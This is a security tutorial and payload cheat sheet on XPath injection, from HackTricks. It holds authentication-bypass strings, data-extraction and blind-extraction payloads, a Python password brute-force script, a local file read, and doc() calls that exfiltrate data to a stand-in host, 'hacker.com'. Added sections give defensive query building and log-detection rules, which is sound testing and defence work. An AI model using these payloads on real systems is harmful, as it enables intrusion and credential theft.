XPATH injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
![](/Mirrors/hacktricks/media/commit/d83d168a2caff3c8be4c4be0ed9fcc73b6637593/.gitbook/assets/image%20%28380%29.png)
Join the HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up to date with the fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed about the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
Basic Syntax
The attack technique known as XPath Injection exploits applications that build XPath (XML Path Language) queries from user input in order to query or navigate XML documents.
Nodes Described
Expressions are used to select various nodes in an XML document. These expressions and their descriptions are listed below:
- nodename: All nodes with the name "nodename" are selected.
- /: The selection starts from the root node.
- //: Nodes matching the selection from the current node are selected, regardless of where they are in the document.
- .: The current node is selected.
- ..: The parent of the current node is selected.
- @: Attributes are selected.
XPath Examples
Examples of path expressions and their results include:
- bookstore: All nodes named "bookstore" are selected.
- /bookstore: The root bookstore element is selected. Note that an absolute path to an element always starts with a slash (/).
- bookstore/book: All book elements that are children of bookstore are selected.
- //book: All book elements in the document are selected, regardless of where they are.
- bookstore//book: All book elements that are descendants of the bookstore element are selected, regardless of their depth under the bookstore element.
- //@lang: All attributes named lang are selected.
Use of Predicates
Predicates are used to refine a selection:
- /bookstore/book[1]: The first book element that is a child of the bookstore element is selected. A workaround for IE versions 5 through 9, which number the first node as [0], is to set SelectionLanguage to XPath via JavaScript.
- /bookstore/book[last()]: The last book element that is a child of the bookstore element is selected.
- /bookstore/book[last()-1]: The second-to-last book element that is a child of the bookstore element is selected.
- /bookstore/book[position()<3]: The first two book elements that are children of the bookstore element are selected.
- //title[@lang]: All title elements that have a lang attribute are selected.
- //title[@lang='en']: All title elements whose "lang" attribute has the value "en" are selected.
- /bookstore/book[price>35.00]: All book elements of the bookstore with a price greater than 35.00 are selected.
- /bookstore/book[price>35.00]/title: All title elements of bookstore books with a price greater than 35.00 are selected.
Handling Unknown Nodes
Wildcards are used to match unknown nodes:
- *: Matches any element node.
- @*: Matches any attribute node.
- node(): Matches any node of any kind.
Further examples include:
- /bookstore/*: Selects all child element nodes of the bookstore element.
- //*: Selects all elements in the document.
- //title[@*]: Selects all title elements that have at least one attribute of any kind.
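To see the path expressions above actually evaluated, here is an added example (not code from the original page) that runs a subset of them with Python's standard xml.etree.ElementTree against a constructed bookstore document. ElementTree implements only a limited XPath subset (the descendant axis is written as .//, predicates support only = and !=, and there is no @*), so the price>35.00 predicate is applied in Python and marked as such in the comments.

```python
import xml.etree.ElementTree as ET

# Constructed bookstore document for the demo (an assumption modelled on the
# classic bookstore example; not data from the page).
BOOKSTORE_XML = """<bookstore>
  <book category="web">
    <title lang="en">Learning XML</title>
    <price>39.95</price>
  </book>
  <book category="children">
    <title lang="en">Harry Potter</title>
    <price>29.99</price>
  </book>
  <book category="web">
    <title lang="de">XQuery Kick Start</title>
    <price>49.99</price>
  </book>
  <book category="cooking">
    <title>Everyday Italian</title>
    <price>30.00</price>
  </book>
</bookstore>"""

ROOT = ET.fromstring(BOOKSTORE_XML)


def titles(elements):
    """Reduce a node-set to book titles: <book> nodes via their child <title>, <title> nodes via their text."""
    return [el.findtext("title") if el.tag == "book" else el.text for el in elements]


def evaluate(path):
    """Evaluate a path expression relative to the <bookstore> root (ElementTree subset only)."""
    return ROOT.findall(path)


def demo():
    """Run the expressions from the syntax section and return their results by name."""
    results = {
        # bookstore/book: every <book> that is a child of the root
        "children": titles(evaluate("book")),
        # //book: every <book> at any depth (ElementTree spells the descendant axis as .//)
        "descendants": titles(evaluate(".//book")),
        # /bookstore/book[1], [last()], [last()-1]: positional predicates
        "first": titles(evaluate("book[1]")),
        "last": titles(evaluate("book[last()]")),
        "second_last": titles(evaluate("book[last()-1]")),
        # //title[@lang]: titles that carry a lang attribute at all
        "with_lang": titles(evaluate(".//title[@lang]")),
        # //title[@lang='en']: titles whose lang attribute equals "en"
        "english": titles(evaluate(".//title[@lang='en']")),
    }
    # /bookstore/book[price>35.00]: ElementTree predicates only support = and !=,
    # so the numeric comparison is done in Python instead of inside the path.
    results["expensive"] = titles(b for b in evaluate("book") if float(b.findtext("price")) > 35.00)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:12s} {value}")
```

Running the block prints one line per expression; the point to take away is that a predicate such as [1] is evaluated per parent, and that the library you use decides how much of XPath is really available to an attacker who controls part of the expression.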
Example
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
  <user>
    <name>pepe</name>
    <password>peponcio</password>
    <account>admin</account>
  </user>
  <user>
    <name>mark</name>
    <password>m12345</password>
    <account>regular</account>
  </user>
  <user>
    <name>fino</name>
    <password>fino2</password>
    <account>regular</account>
  </user>
</data>
```
Access the information
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()
Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substring(//user[position()=2]/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Identify & steal the schema
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/*[1]/*) = 0 #count(g) = 0
#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but just the schema)
```xml
<root>
  <a>
    <b></b>
  </a>
  <c>
    <d></d>
    <e></e>
    <f>
      <g></g>
    </f>
  </c>
</root>
```
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #First char of tag `<b>` is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Authentication Bypass
Example queries:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
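The following is an added example, not the page's or any project's code, that puts the vulnerable concatenation from the first query above next to two defensive options: an xpath_literal helper (my name) that turns a value into an XPath 1.0 string literal, falling back to concat() when the value holds both quote characters, since XPath 1.0 literals have no escape sequence; and an authenticate function (also mine) that avoids building XPath from input altogether and compares in code. The users document is the one from the example section, embedded so the block runs on its own.

```python
import xml.etree.ElementTree as ET

# The users document from the example section, embedded so the block is self-contained.
USERS_XML = """<data>
  <user><name>pepe</name><password>peponcio</password><account>admin</account></user>
  <user><name>mark</name><password>m12345</password><account>regular</account></user>
  <user><name>fino</name><password>fino2</password><account>regular</account></user>
</data>"""


def build_query_unsafe(username, password):
    """Vulnerable: input is spliced straight into the XPath string (the VAR_USER / VAR_PASSWD pattern)."""
    return ("string(//user[name/text()='" + username +
            "' and password/text()='" + password + "']/account/text())")


def xpath_literal(value):
    """Render a Python string as an XPath 1.0 string literal that cannot terminate its own quotes.

    XPath 1.0 has no escape sequence inside literals, so a value containing both ' and "
    is assembled with concat(). This is the usual mitigation when the XPath API offers
    no real parameter binding (helper name is mine, not a library function).
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i > 0:
            pieces.append("\"'\"")   # the single quote itself, wrapped in double quotes
        if part:
            pieces.append("'" + part + "'")
    return "concat(" + ", ".join(pieces) + ")"


def build_query_safe(username, password):
    """Same query, but every value is an escaped literal, so quotes in the input stay data."""
    return ("string(//user[name/text()=" + xpath_literal(username) +
            " and password/text()=" + xpath_literal(password) + "]/account/text())")


def authenticate(username, password, xml=USERS_XML):
    """Preferred fix: no XPath is built from input at all; walk the document and compare in code.

    Returns the account type on a match, or None. Comparison in Python means a quote,
    an 'or', or a ']' in the input has no syntactic meaning anywhere.
    """
    root = ET.fromstring(xml)
    for user in root.findall("user"):
        if user.findtext("name") == username and user.findtext("password") == password:
            return user.findtext("account")
    return None


if __name__ == "__main__":
    probe = "' or '1'='1"
    print("unsafe:", build_query_unsafe(probe, probe))
    print("safe:  ", build_query_safe(probe, probe))
    print("login as pepe:", authenticate("pepe", "peponcio"))
    print("login with probe:", authenticate(probe, probe))
```

With the classic ' or '1'='1 value in both fields, build_query_unsafe produces exactly the collapsed predicate shown further down on this page, whereas build_query_safe keeps the whole value inside one double-quoted literal and authenticate returns None. Of the two defences, the structured lookup is the one to reach for first; the literal builder is for code that genuinely needs a dynamic path.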
OR bypass in username and password (same value in both)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Abusing null injection
Username: ' or 1]%00
Double OR in username or in password (valid with only one vulnerable field)
IMPORTANT: Notice that the "and" is the first operation performed.
Bypass with first match
(These requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2nd account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
String extraction
The output contains strings and the user can manipulate the values to search for:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Blind Exploitation
Get the length of a value and extract it by comparisons:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True if the first character equals "a"
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it raises an error and never returns a value
Python Example
```python
import requests, string

flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"

# Step 1: find the length of the value by testing string-length() against each candidate
for i in range(30):
    r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
    if ("TRUE_COND" in r.text):
        l = i
        break
print("[+] Password length: " + str(l))

# Step 2: recover the value one position at a time with substring()
for i in range(1, l + 1):
    #print("[i] Looking for char number " + str(i))
    for al in alphabet:
        r = requests.get("http://example.com?action=user&userid=2 and substring(password," + str(i) + ",1)=" + al)
        if ("TRUE_COND" in r.text):
            flag += al
            print("[+] Flag: " + flag)
            break
```
Read file
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1)) < 127
OOB Exploitation
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#doc-available will return true or false depending on whether the doc exists,
#use not(doc-available(...)) to invert the result if you need to
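From the detection side, here is an added example (not from the page) that scans constructed access-log lines for the indicators the payloads on this page have in common: a quote followed by a boolean operator, a ] closing a predicate followed by a union |, a NUL byte, XPath function calls inside a parameter value, and doc()/doc-available() wrapped around concat(), which is the out-of-band pattern above. The endpoint paths and parameter names (/login, user, passwd, userid) are assumptions, and the O'Reilly line is included to show that a lone apostrophe should not raise an alert on its own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for the demo (not real traffic). Paths and
# parameter names are assumptions; the payload shapes are the ones on this page.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=pepe&passwd=peponcio HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /login?user=%27%20or%20%271%27%3D%271&passwd=x HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /login?user=%27%20or%201%5D%00&passwd=x HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /user?userid=2%20and%20string-length(password)%3D6 HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /user?userid=doc(concat(%22http://oob.example/%22,name(/*[1]))) HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=O%27Reilly HTTP/1.1" 200 900
"""

# Each rule is (name, regex) and runs against the URL-decoded parameter value.
RULES = [
    # a string literal closed and immediately followed by a boolean operator: ' or ...
    ("quote_boolean", re.compile(r"""['"]\s*(or|and)\s+""", re.I)),
    # predicate closed and a union started: ...] | //...
    ("union_pipe", re.compile(r"\]\s*\|\s*/")),
    # NUL byte used to truncate the rest of the expression
    ("null_byte", re.compile(r"\x00")),
    # XPath functions that have no business appearing in a username or id
    ("xpath_function", re.compile(
        r"\b(count|string-length|substring|name|position|codepoints-to-string|string-to-codepoints)\s*\(", re.I)),
    # doc()/doc-available() around concat(): data being pushed to an external document URL
    ("external_doc", re.compile(r"\b(doc|doc-available)\s*\(\s*concat\s*\(", re.I)),
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def decode_params(target):
    """Split the request target into decoded (name, value) pairs; %00 becomes a real NUL byte."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line):
    """Return the (parameter, rule) hits for one access-log line, or [] when it is clean."""
    m = LINE_RE.match(line)
    if not m:
        return []
    hits = []
    for name, value in decode_params(m.group("target")):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((name, rule))
    return hits


def scan_log(text):
    """Map each client IP with at least one hit to the set of rules it triggered."""
    report = {}
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        hits = scan_line(line)
        if m and hits:
            report.setdefault(m.group("ip"), set()).update(rule for _, rule in hits)
    return report


if __name__ == "__main__":
    for ip, rules in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, sorted(rules))
```

Decoding the query string before matching is what makes the rules work: the quote, the ] and the NUL are all percent-encoded on the wire. In a real deployment the external_doc rule is the one worth a high-severity alert, since a 500 response together with an outbound fetch to an unknown host is a strong sign the XPath engine supports doc() and the application is exposing it.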
Automatic Tool
References
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
- https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)
- https://www.w3schools.com/xml/xpath_syntax.asp